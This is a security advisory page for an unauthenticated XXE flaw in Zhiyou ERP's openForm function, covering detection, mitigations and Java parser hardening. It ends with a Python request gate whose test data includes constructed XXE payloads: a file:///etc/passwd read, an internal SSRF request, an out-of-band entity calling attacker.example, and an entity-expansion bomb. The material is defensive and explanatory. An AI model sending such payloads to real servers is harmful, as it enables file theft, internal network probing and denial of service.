CVE-2025-11140 Overview
A critical XML External Entity (XXE) vulnerability has been identified in Bjskzy Zhiyou ERP up to version 11.0. It lies in the openForm function of the com.artery.richclient.RichClientService component: the contentString argument is parsed as XML with external entity resolution left enabled, so an attacker who controls that argument can declare external entities that the parser resolves. The flaw is reachable remotely without authentication and can be used to read files the ERP process can access, reach internal hosts from the server (server-side request forgery, SSRF), or exhaust parser resources (denial of service).
Critical Impact
Remote, unauthenticated attackers can use this XXE flaw to read confidential data, enumerate internal network resources, or disrupt service availability. A public exploit exists, which raises the likelihood of active exploitation, and no vendor fix is available (see Patch Information).
Affected Products
- Zhiyou-group Zhiyou ERP versions up to 11.0
- com.artery.richclient.RichClientService component
- Systems with exposed RichClientService endpoints
Discovery Timeline
- September 29, 2025 - CVE-2025-11140 published to NVD
- October 3, 2025 - Last updated in NVD database
Technical Details for CVE-2025-11140
Vulnerability Analysis
This XXE vulnerability (CWE-611: Improper Restriction of XML External Entity Reference) arises because the application neither disables external entity processing in its XML parser nor validates the XML it receives. The openForm function in the RichClientService component accepts a contentString argument that is parsed as XML without either control. When an attacker submits XML whose DOCTYPE declares an external entity, the parser resolves it and, wherever the entity is referenced, substitutes the contents of the named file or URL, leading to information disclosure or to requests made from the server on the attacker's behalf.
The vulnerability is classified under both CWE-611 (XML External Entity Reference) and CWE-610 (Externally Controlled Reference to a Resource in Another Sphere), indicating that the application does not properly restrict access to external resources referenced within user-supplied XML data.
Root Cause
The root cause is the insecure configuration of the XML parser used by the openForm function in the RichClientService component: DTD processing is not disabled, external entity resolution is not blocked, and the contentString parameter receives no validation of its own. A submitted document whose DTD declares an external entity therefore makes the parser fetch whatever the entity's SYSTEM identifier points at, whether a local file path (file://) or a URL reachable from the server.
Attack Vector
The attack can be executed remotely over the network without authentication. An attacker crafts an XML payload whose DTD declares an external entity pointing at a sensitive file on the server (such as /etc/passwd on Unix systems, or configuration files containing credentials) or at an internal network resource. When the payload is submitted to the vulnerable openForm function via the contentString parameter, the parser resolves the entity and, if the parsed value is echoed, the contents of the targeted resource appear in the application's response. Where nothing is echoed, the standard XXE fallback is a parameter entity that loads an attacker-hosted DTD, which in turn sends the data to an attacker-controlled host (out-of-band XXE); the server's ability to make outbound connections is then the limiting factor.
This attack vector enables several exploitation scenarios:
- File Disclosure: Reading sensitive configuration files, credentials, or application source code
- SSRF Attacks: Probing internal network infrastructure or accessing internal services
- Denial of Service: nested entity expansion (the "billion laughs" pattern) or entities pointing at very large or never-ending resources, exhausting parser memory or tying up worker threads
The exploit is publicly documented (GitHub project documentation), and additional technical details are available through VulDB #326217.
Detection Methods for CVE-2025-11140
Indicators of Compromise
- HTTP requests to RichClientService endpoints whose XML body contains a <!DOCTYPE declaration or <!ENTITY declarations; unless legitimate clients are known to send DTDs, treat any DTD in this traffic as suspect
- Requests to the openForm function whose contentString parameter contains SYSTEM or PUBLIC identifiers (file://, http://, ftp:// and similar URIs) or parameter entity references of the form %name;
- Process or audit telemetry (auditd, EDR) showing the ERP's Java process reading files it has no reason to read, such as /etc/passwd, /etc/shadow, application configuration files holding credentials, or the Windows SAM hive; ordinary application logs will not record these reads
- Outbound connections or DNS lookups from the ERP server to unexpected external hosts or to internal addresses it does not normally contact; a DNS query for an attacker-chosen name is often the first sign of out-of-band exfiltration
Detection Strategies
- Implement web application firewall (WAF) rules that block XML bodies containing a <!DOCTYPE declaration; treat this as a stopgap, since a WAF may not see a payload delivered in an encoding it does not normalise (UTF-16 XML, for example) or wrapped inside a compressed or base64-encoded field
- Inspect HTTP request bodies for SYSTEM, PUBLIC or URI references inside DTD declarations, and for the %name; syntax of parameter entities
- Configure intrusion detection systems (IDS) to alert on file:// URIs and sensitive path strings inside requests to the RichClientService component; the path appears in the request itself, not in a separate file-access event a network sensor could observe
- Review logs regularly for anomalous requests to the openForm function (unusual sources, unusual volumes, unusually large or malformed contentString values)
Monitoring Recommendations
- Enable detailed request logging for all RichClientService component interactions, including the full contentString value where data-handling policy allows, so that a payload can be reconstructed during an investigation
- Implement file integrity monitoring on sensitive system and application configuration files
- Monitor network traffic for unusual outbound connections originating from the Zhiyou ERP server
- Establish baseline behavior for the openForm function and alert on deviations in request patterns or payload sizes
How to Mitigate CVE-2025-11140
Immediate Actions Required
- Restrict network access to the RichClientService component to trusted IP addresses only
- Reject, rather than attempt to sanitise, any contentString payload that contains a DTD declaration or external entity reference; stripping the DOCTYPE leaves dangling entity references and a parse error, so rejection is the cleaner outcome
- Deploy a web application firewall with rules designed to detect and block XXE patterns, bearing in mind that encoded or wrapped payloads can slip past pattern matching, so the WAF complements rather than replaces the parser-level fix
- Isolate affected Zhiyou ERP systems from sensitive network segments until a patch is available
Patch Information
The vendor (Zhiyou-group) was contacted regarding this vulnerability but did not respond. At the time of publication, no official patch is available. Organizations using affected versions of Zhiyou ERP should implement the workarounds described below and monitor vendor communications for security updates.
Additional vulnerability information is available through VulDB CTI ID #326217 and VulDB Submission #658090.
Workarounds
- Disable external entity processing in the XML parser. For the JDK's built-in parsers this can be done without touching the application by setting the JAXP system properties javax.xml.accessExternalDTD, javax.xml.accessExternalSchema and javax.xml.accessExternalStylesheet to the empty string (for example -Djavax.xml.accessExternalDTD="" on the JVM command line, or in the JRE's jaxp.properties file); the application can override these in code and a bundled third-party parser may ignore them, so verify with a harmless test payload afterwards
- Implement network segmentation to limit the exposure of the RichClientService component
- Use a reverse proxy or WAF to reject XML requests that carry a DTD before they reach the application
- Consider temporarily disabling the openForm functionality if it is not business-critical until a proper fix is available
// Example XML parser hardening (Java fragment, application-specific: the page does not say which parser openForm uses)
import javax.xml.XMLConstants; import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.stream.XMLInputFactory; import javax.xml.transform.TransformerFactory;
XMLInputFactory xif = XMLInputFactory.newInstance();               // StAX: refuse DTDs and external entities
xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); // DOM/SAX: forbid DOCTYPE, block external fetches
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); // throws ParserConfigurationException if unsupported
dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
TransformerFactory tf = TransformerFactory.newInstance();          // XSLT: keep stylesheets from pulling remote resources
tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
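The following is an added example, not code from the Zhiyou ERP product or from VulDB, that implements the request-level checks described under Detection Strategies and the "reject payloads containing a DTD" workaround above in one place: a gate that sits in front of the openForm endpoint (in a reverse proxy, WAF plug-in or log-replay script) and classifies each contentString value. It assumes the XML travels in a form-encoded parameter named contentString (the page names the parameter but not the transport), and every sample payload in it is constructed for the demo, including the attacker.example hostname and the 10.0.0.5 address.

```python
"""Pre-parse gate for XML submitted to RichClientService.openForm (added example).

Not Zhiyou ERP code. Assumptions: the request carries the XML in a form-encoded
parameter named contentString, and the sample payloads below are constructed.
"""
import re
from typing import List, NamedTuple
from urllib.parse import parse_qs, urlencode


class Finding(NamedTuple):
    rule: str       # which check fired
    evidence: str   # matched text, suitable for an alert


# XML keywords are case-sensitive, so "<!doctype" is not a valid DTD anyway;
# matching case-insensitively only rejects more, never less.
_DOCTYPE = re.compile(r"<!DOCTYPE\b", re.I)
_EXTERNAL = re.compile(r"<!ENTITY\s+(?:%\s*)?[\w.-]+\s+(?:SYSTEM|PUBLIC)\b[^>]*>", re.I)
_PARAM = re.compile(r"<!ENTITY\s+%", re.I)
_DECL = re.compile(r"<!ENTITY\b", re.I)
_REF = re.compile(r"&[\w.-]+;")


def inspect_xml(xml: str, max_refs: int = 20) -> List[Finding]:
    """Return every XXE indicator found in an XML document; empty means clean.

    max_refs is a tuning assumption: a document that declares entities and then
    references entities more than this many times is treated as an expansion bomb.
    Built-in references such as &amp; count only when the document also declares
    entities, so ordinary documents never trip the check.
    """
    findings: List[Finding] = []
    m = _DOCTYPE.search(xml)
    if m:
        findings.append(Finding("dtd_present", m.group(0)))
    for m in _EXTERNAL.finditer(xml):          # SYSTEM/PUBLIC: file read, SSRF, remote DTD
        findings.append(Finding("external_entity", m.group(0)))
    m = _PARAM.search(xml)
    if m:                                      # parameter entities are the out-of-band building block
        findings.append(Finding("parameter_entity", m.group(0)))
    decls = len(_DECL.findall(xml))
    refs = len(_REF.findall(xml))
    if decls and refs > max_refs:              # billion-laughs style expansion
        findings.append(Finding("entity_expansion", f"{decls} declarations, {refs} references"))
    return findings


def inspect_form_body(body: str) -> List[Finding]:
    """Extract contentString from a form-encoded body (assumed transport) and inspect it."""
    values = parse_qs(body, keep_blank_values=True).get("contentString", [])
    return inspect_xml(values[0]) if values else []


def allow_request(body: str) -> bool:
    """Gate decision: forward only bodies whose contentString carries no DTD constructs."""
    return not inspect_form_body(body)


def form_body(xml: str) -> str:
    """Build the assumed request body shape for a given contentString value."""
    return urlencode({"contentString": xml})


def rules_for(xml: str) -> set:
    """The set of rule names that fire for a document."""
    return {f.rule for f in inspect_xml(xml)}


# Constructed sample payloads (not captured traffic).
BENIGN = '<form id="po-1"><field name="qty">3 &amp; 4</field></form>'
FILE_READ = ('<?xml version="1.0"?><!DOCTYPE f [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
             '<form><field>&xxe;</field></form>')
SSRF = '<!DOCTYPE f [<!ENTITY xxe SYSTEM "http://10.0.0.5:8080/">]><form>&xxe;</form>'
OOB = '<!DOCTYPE f [<!ENTITY % ext SYSTEM "http://attacker.example/x.dtd">%ext;]><form/>'
BOMB = ('<!DOCTYPE b [<!ENTITY a "aaaaaaaaaa"><!ENTITY b "' + "&a;" * 10 + '">'
        '<!ENTITY c "' + "&b;" * 10 + '">]><form>&c;</form>')


if __name__ == "__main__":
    for name, xml in [("benign", BENIGN), ("file", FILE_READ), ("ssrf", SSRF),
                      ("oob", OOB), ("bomb", BOMB)]:
        print(f"{name:7} allow={allow_request(form_body(xml))} rules={sorted(rules_for(xml))}")
```

The gate rejects instead of stripping because removing the DOCTYPE from FILE_READ would leave a dangling &xxe; reference and a parse error downstream; the rule names map directly onto the three exploitation scenarios above (external_entity for file disclosure and SSRF, parameter_entity for the out-of-band variant, entity_expansion for denial of service), so the same function feeds both the blocking decision and the alert text. It inspects the decoded parameter value, so it must run after whatever transport decoding the proxy performs; it does not see payloads hidden inside encodings it is never handed.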
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

